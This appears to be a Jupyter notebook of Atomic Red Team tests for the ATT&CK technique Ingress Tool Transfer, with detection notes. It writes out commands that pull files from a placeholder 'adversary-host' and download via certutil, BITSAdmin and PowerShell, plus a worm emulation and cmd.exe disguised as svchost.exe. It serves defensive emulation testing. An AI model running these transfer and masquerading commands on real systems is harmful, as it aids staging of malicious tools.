{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1105 - Ingress Tool Transfer",
    "\n",
    "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - rsync remote file copy (push)\nUtilize rsync to perform a remote file copy (push)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nrsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 1"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #2 - rsync remote file copy (pull)\nUtilize rsync to perform a remote file copy (pull)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nrsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 2"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #3 - scp remote file copy (push)\nUtilize scp to perform a remote file copy (push)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nscp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 3"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #4 - scp remote file copy (pull)\nUtilize scp to perform a remote file copy (pull)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nscp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 4"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #5 - sftp remote file copy (push)\nUtilize sftp to perform a remote file copy (push)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nsftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 5"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #6 - sftp remote file copy (pull)\nUtilize sftp to perform a remote file copy (pull)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nsftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 6"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #7 - certutil download (urlcache)\nUse certutil -urlcache argument to download a file from the web. Note - /urlcache also works!\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\ncmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 7"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #8 - certutil download (verifyctl)\nUse certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\n$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 8"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #9 - Windows - BITSAdmin BITS Download\nThis test uses BITSAdmin.exe to schedule a BITS job for the download of a file.\nThis technique is used by Qbot malware to download payloads.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nC:\\Windows\\System32\\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt %temp%\\Atomic-license.txt\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 9"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #10 - Windows - PowerShell Download\nThis test uses PowerShell to download a payload.\nThis technique is used by multiple adversaries and malware families.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\n(New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\", \"$env:TEMP\\Atomic-license.txt\")\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 10"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #11 - OSTAP Worming Activity\nOSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\npushd \\\\localhost\\C$\necho var fileObject = WScript.createobject(\"Scripting.FileSystemObject\");var newfile = fileObject.CreateTextFile(\"AtomicTestFileT1105.js\", true);newfile.WriteLine(\"This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.\");newfile.Close(); > AtomicTestT1105.js\nCScript.exe AtomicTestT1105.js //E:JScript\ndel AtomicTestT1105.js /Q >nul 2>&1\ndel AtomicTestFileT1105.js /Q >nul 2>&1\npopd\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 11"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #12 - svchost writing a file to a UNC path\nsvchost.exe writing a non-Microsoft Office file to a file with a UNC path.\nUpon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\\`, then execute svchost.exe with output to a txt file.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\ncopy C:\\Windows\\System32\\cmd.exe C:\\svchost.exe\nC:\\svchost.exe /c echo T1105 > \\\\localhost\\c$\\T1105.txt\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 12"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Shield Active Defense\n### PCAP Collection \n Collect full network traffic for future research and analysis. \n\n PCAP Collection allows a defenders to use the data to examine an adversary\u2019s network traffic more closely, including studying if it is encoded and/or encrypted. PCAP can be run through tools to replay the traffic to get a real-time view of what happened over the wire. These tools can also parse the traffic and send results to a SIEM for monitoring and alerting.\n#### Opportunity\nThere is an opportunity to collect network data and analyze the adversary activity it contains.\n#### Use Case\nCollecting full packet capture of all network traffic allows you to review what happened over the connection and identify command and control traffic and/or exfiltration activity.\n#### Procedures\nCollect PCAP on a decoy network to improve visibility into an adversary's network activity."
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}